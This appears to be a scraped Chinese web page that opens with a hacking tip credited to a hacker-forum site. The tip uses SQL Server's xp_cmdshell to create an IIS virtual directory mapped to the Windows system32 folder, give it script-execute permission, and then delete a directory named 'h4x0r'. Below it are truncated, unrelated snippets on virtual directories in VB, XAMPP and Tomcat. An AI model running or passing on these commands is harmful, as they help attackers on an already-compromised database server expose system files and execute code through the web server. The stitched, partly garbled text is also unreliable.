exec master.dbo.xp_cmdshell 』cscript c:/interpub/adminscripts/mkwebdir.vbs -c localhost -w "l" -v "win","c:/winnt/system32"』
建立虛擬目錄win,指向c:/winnt/system32
exec master.dbo.xp_cmdshell 』cscript c:/interpub/adminscripts/adsutil.vbs w3svc/1/root/win/acces***ecute ture』
讓win句有解析asp指令碼許可權
exec master.dbo.xp_cmdshell "cscript c:/interpub/adminscripts/adsutil.vbs delete w3svc/1/root/h4x0r/"
刪除虛擬目錄。
找不到web絕對路徑的一種解決辦法,
403錯誤,表示虛擬目錄建好了。。。
摘自紅色黑客聯盟(www.7747.net) 原文:
建立虛擬目錄
function criadiretoriovirtual byval vdirname as string,byval serverid as string,byval vdirpath as boolean as directoryentry dim newvdir as directoryen...
xampp apache建立虛擬目錄
1 用記事本開啟c windows system32 drivers etc hosts檔案,配置如下 127.0.0.1 phptest 注,如果在瀏覽器位址列輸入phptest被搜尋引擎導航到搜尋頁,請在前面加http 2 xampp control panel apache config ht...
Tomcat建立虛擬目錄
1.找到 tomcat home conf裡的server.xml檔案 2.在在和之間加上如下 嚴格區分大小寫,當path 時,此時的虛擬目錄直接為root http localhost 8080 引數 path 表示在瀏覽器中輸入http localhost 8080 虛擬目錄名 debug 示例...